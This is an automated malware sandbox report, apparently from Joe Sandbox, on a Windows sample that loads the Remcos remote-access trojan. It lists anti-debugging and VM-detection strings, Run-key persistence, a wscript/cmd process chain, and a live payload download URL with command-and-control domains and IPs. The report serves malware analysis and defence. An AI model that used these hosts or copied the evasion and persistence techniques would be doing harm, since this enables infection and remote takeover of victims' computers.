Source: mU9H96igb3.exe, 00000002.00000002.137587305880.0000000002C10000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138445750884.0000000002300000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138639201953.0000000002230000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138719079086.00000000022B0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Dlls.exe, 00000012.00000002.138718337791.000000000073C000.00000004.00000020.sdmp	Binary or memory string: trogram Files\Qemu-ga\qemu-ga.exet
Source: Dlls.exe, 00000013.00000002.142216361110.00000000008F5000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWw4
Source: Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: mU9H96igb3.exe, 00000009.00000002.137983452106.00000000009A5000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW(<
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: mU9H96igb3.exe, 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, Dlls.exe, 00000013.00000002.142216361110.00000000008F5000.00000004.00000020.sdmp, Dlls.exe, 00000014.00000002.139080544159.0000000000758000.00000004.00000020.sdmp, Dlls.exe, 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binhttp://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bin
Source: mU9H96igb3.exe, 00000002.00000002.137587305880.0000000002C10000.00000004.00000001.sdmp, mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138445750884.0000000002300000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138639201953.0000000002230000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138719079086.00000000022B0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: Dlls.exe, 00000014.00000002.139081030100.00000000007C5000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW :WA
Source: mU9H96igb3.exe, 00000002.00000002.137588937397.0000000004819000.00000004.00000001.sdmp, Dlls.exe, 0000000F.00000002.138447681995.0000000004899000.00000004.00000001.sdmp, Dlls.exe, 00000011.00000002.138641199655.0000000004FC9000.00000004.00000001.sdmp, Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: Dlls.exe, 00000012.00000002.138720972509.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\mU9H96igb3.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\mU9H96igb3.exe

Code function: 2_2_02BFFBA1 rdtsc

2_2_02BFFBA1

Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BF46A0 mov eax, dword ptr fs:[00000030h]	2_2_02BF46A0
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02C01BCE mov eax, dword ptr fs:[00000030h]	2_2_02C01BCE
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BFC054 mov eax, dword ptr fs:[00000030h]	2_2_02BFC054
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 2_2_02BFE990 mov eax, dword ptr fs:[00000030h]	2_2_02BFE990
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_0057C054 mov eax, dword ptr fs:[00000030h]	9_2_0057C054
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_005746A0 mov eax, dword ptr fs:[00000030h]	9_2_005746A0
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_00581BCE mov eax, dword ptr fs:[00000030h]	9_2_00581BCE
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Code function: 9_2_0057E990 mov eax, dword ptr fs:[00000030h]	9_2_0057E990
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C246A0 mov eax, dword ptr fs:[00000030h]	15_2_02C246A0
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C31BCE mov eax, dword ptr fs:[00000030h]	15_2_02C31BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C2C054 mov eax, dword ptr fs:[00000030h]	15_2_02C2C054
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 15_2_02C2E990 mov eax, dword ptr fs:[00000030h]	15_2_02C2E990
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F646A0 mov eax, dword ptr fs:[00000030h]	17_2_04F646A0
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F6C054 mov eax, dword ptr fs:[00000030h]	17_2_04F6C054
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F71BCE mov eax, dword ptr fs:[00000030h]	17_2_04F71BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 17_2_04F6E990 mov eax, dword ptr fs:[00000030h]	17_2_04F6E990
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_0235C054 mov eax, dword ptr fs:[00000030h]	18_2_0235C054
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_023546A0 mov eax, dword ptr fs:[00000030h]	18_2_023546A0
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_0235E990 mov eax, dword ptr fs:[00000030h]	18_2_0235E990
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 18_2_02361BCE mov eax, dword ptr fs:[00000030h]	18_2_02361BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_0057C054 mov eax, dword ptr fs:[00000030h]	20_2_0057C054
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_005746A0 mov eax, dword ptr fs:[00000030h]	20_2_005746A0
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_00581BCE mov eax, dword ptr fs:[00000030h]	20_2_00581BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 20_2_0057E990 mov eax, dword ptr fs:[00000030h]	20_2_0057E990
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_0057C054 mov eax, dword ptr fs:[00000030h]	21_2_0057C054
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_005746A0 mov eax, dword ptr fs:[00000030h]	21_2_005746A0
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_00581BCE mov eax, dword ptr fs:[00000030h]	21_2_00581BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Code function: 21_2_0057E990 mov eax, dword ptr fs:[00000030h]	21_2_0057E990

Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\mU9H96igb3.exe

Code function: 2_2_02BF742D LdrInitializeThunk,

2_2_02BF742D

Source: C:\Users\user\Desktop\mU9H96igb3.exe

Code function: 9_2_0058474A RtlAddVectoredExceptionHandler,

9_2_0058474A

Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process created: C:\Users\user\Desktop\mU9H96igb3.exe 'C:\Users\user\Desktop\mU9H96igb3.exe'	Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	Process created: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe 'C:\Users\user\AppData\Roaming\Adobes\Dlls.exe'	Jump to behavior

Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp	Binary or memory string: Program ManagerCJBCA\D
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp	Binary or memory string: Program Manager#
Source: Dlls.exe, 00000013.00000002.142216831813.0000000001020000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp	Binary or memory string: Program ManagerCJB
Source: Dlls.exe, 00000013.00000002.142216831813.0000000001020000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: Dlls.exe, 00000013.00000002.142216831813.0000000001020000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp	Binary or memory string: Program ManagerCJBCA\
Source: Dlls.exe, 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp	Binary or memory string: [ Program Manager ]
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp	Binary or memory string: Program Managerr\|
Source: Dlls.exe, 00000013.00000002.142216831813.0000000001020000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp	Binary or memory string: Program Manager2
Source: Dlls.exe, 00000013.00000002.142216216346.00000000008D9000.00000004.00000020.sdmp	Binary or memory string: \|Program Manager\|
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp	Binary or memory string: Program Manager~
Source: Dlls.exe, 00000013.00000002.142216438869.0000000000902000.00000004.00000020.sdmp	Binary or memory string: Program Manager\|

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.139148381196.0000000000870000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mU9H96igb3.exe PID: 6380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Dlls.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Dlls.exe PID: 3384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Dlls.exe PID: 4696, type: MEMORYSTR

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Remote Access Functionality:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.139148381196.0000000000870000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mU9H96igb3.exe PID: 6380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Dlls.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Dlls.exe PID: 3384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Dlls.exe PID: 4696, type: MEMORYSTR

Detected Remcos RAT

Show sources

Source: Dlls.exe, 00000014.00000002.139080544159.0000000000758000.00000004.00000020.sdmp	String found in binary or memory: Remcos_Mutex_Inj
Source: Dlls.exe, 00000015.00000002.139147980600.0000000000818000.00000004.00000020.sdmp	String found in binary or memory: Remcos_Mutex_InjJ

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting11	Registry Run Keys / Startup Folder11	Process Injection12	Masquerading1	Input Capture11	Security Software Discovery421	Remote Services	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	DLL Side-Loading1	Registry Run Keys / Startup Folder11	Virtualization/Sandbox Evasion23	LSASS Memory	Virtualization/Sandbox Evasion23	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	DLL Side-Loading1	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting11	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Information Discovery13	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol112	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
mU9H96igb3.exe	33%	Virustotal		Browse
mU9H96igb3.exe	26%	Metadefender		Browse
mU9H96igb3.exe	24%	ReversingLabs	Win32.Trojan.Mucc
mU9H96igb3.exe	100%	Avira	TR/AD.Nekark.fexqx

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	100%	Avira	TR/AD.Nekark.fexqx
C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	26%	Metadefender		Browse
C:\Users\user\AppData\Roaming\Adobes\Dlls.exe	24%	ReversingLabs	Win32.Trojan.Mucc

Unpacked PE Files

Source	Detection	Scanner	Label	Download
21.0.Dlls.exe.400000.0.unpack	100%	Avira	TR/AD.Nekark.fexqx	Download File
16.0.Dlls.exe.400000.0.unpack	100%	Avira	TR/AD.Nekark.fexqx	Download File
19.0.Dlls.exe.400000.0.unpack	100%	Avira	TR/AD.Nekark.fexqx	Download File
16.2.Dlls.exe.400000.0.unpack	100%	Avira	TR/AD.Nekark.fexqx	Download File
17.0.Dlls.exe.400000.0.unpack	100%	Avira	TR/AD.Nekark.fexqx	Download File
18.0.Dlls.exe.400000.0.unpack	100%	Avira	TR/AD.Nekark.fexqx	Download File
2.0.mU9H96igb3.exe.400000.0.unpack	100%	Avira	TR/AD.Nekark.fexqx	Download File
9.0.mU9H96igb3.exe.400000.0.unpack	100%	Avira	TR/AD.Nekark.fexqx	Download File
15.0.Dlls.exe.400000.0.unpack	100%	Avira	TR/AD.Nekark.fexqx	Download File
20.0.Dlls.exe.400000.0.unpack	100%	Avira	TR/AD.Nekark.fexqx	Download File

Domains

Source	Detection	Scanner	Label	Link
Venonletmonitprradministratioran.loseyourip.com	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binx	0%	Avira URL Cloud	safe
http://implantecapilarpereira.com/NetGen	0%	Avira URL Cloud	safe
http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bint	0%	Avira URL Cloud	safe
http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binhttp://implantecapilarperei	0%	Avira URL Cloud	safe
monitprradministratioran.loseyourip.com	0%	Avira URL Cloud	safe
http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binn	0%	Avira URL Cloud	safe
http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bin	0%	Avira URL Cloud	safe
http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binHR	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
Venonletmonitprradministratioran.loseyourip.com	8.6.8.23	true	true	4%, Virustotal, Browse	unknown
implantecapilarpereira.com	83.167.224.147	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://implantecapilarpereira.com/NetGen	true	Avira URL Cloud: safe	unknown
monitprradministratioran.loseyourip.com	true	Avira URL Cloud: safe	unknown
http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binx	mU9H96igb3.exe, 00000009.00000002.137983749150.00000000009E0000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bint	mU9H96igb3.exe, 00000009.00000002.137983749150.00000000009E0000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binhttp://implantecapilarperei	mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binn	Dlls.exe, 00000014.00000002.139080544159.0000000000758000.00000004.00000020.sdmp, Dlls.exe, 00000015.00000002.139147980600.0000000000818000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binHR	Dlls.exe, 00000014.00000002.139080944862.00000000007B4000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
8.6.8.23	Venonletmonitprradministratioran.loseyourip.com	United States		20473	AS-CHOOPAUS	true
83.167.224.147	implantecapilarpereira.com	Czech Republic		24971	MASTER-ASCzechRepublicwwwmasterczCZ	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	1662
Start date:	14.10.2021
Start time:	08:35:48
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	mU9H96igb3.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@19/4@2/2
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 56% Number of executed functions: 108 Number of non-executed functions: 14
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe Excluded IPs from analysis (whitelisted): 20.82.207.122, 20.50.102.62, 92.123.195.35, 92.123.195.73, 93.184.221.240, 20.82.210.154 Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, wu-shim.trafficmanager.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, wdcp.microsoft.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, wd-prod-cp.trafficmanager.net, arc.msn.com, wu.azureedge.net, wdcpalt.microsoft.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:39:01	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chrome "C:\Users\user\AppData\Roaming\Adobes\Dlls.exe"
08:39:09	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Chrome "C:\Users\user\AppData\Roaming\Adobes\Dlls.exe"
08:39:17	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chrome "C:\Users\user\AppData\Roaming\Adobes\Dlls.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
8.6.8.23	E5onSB0pfg.exe	Get hash	malicious	Browse
	D8oUzPUNCR.exe	Get hash	malicious	Browse
	4KGPfYWyyJ.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
Venonletmonitprradministratioran.loseyourip.com	E5onSB0pfg.exe	Get hash	malicious	Browse	8.6.8.23
	D8oUzPUNCR.exe	Get hash	malicious	Browse	8.6.8.23
	4KGPfYWyyJ.exe	Get hash	malicious	Browse	8.6.8.23
	GT7LdgfsBD.exe	Get hash	malicious	Browse	77.247.127.169

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-CHOOPAUS	8h5TwcAsZi	Get hash	malicious	Browse	216.155.164.0
	b3astmode.arm7	Get hash	malicious	Browse	167.179.103.219
	SecuriteInfo.com.Trojan.Linux.Generic.191302.28689.5288	Get hash	malicious	Browse	45.76.137.101
	E5onSB0pfg.exe	Get hash	malicious	Browse	8.6.8.23
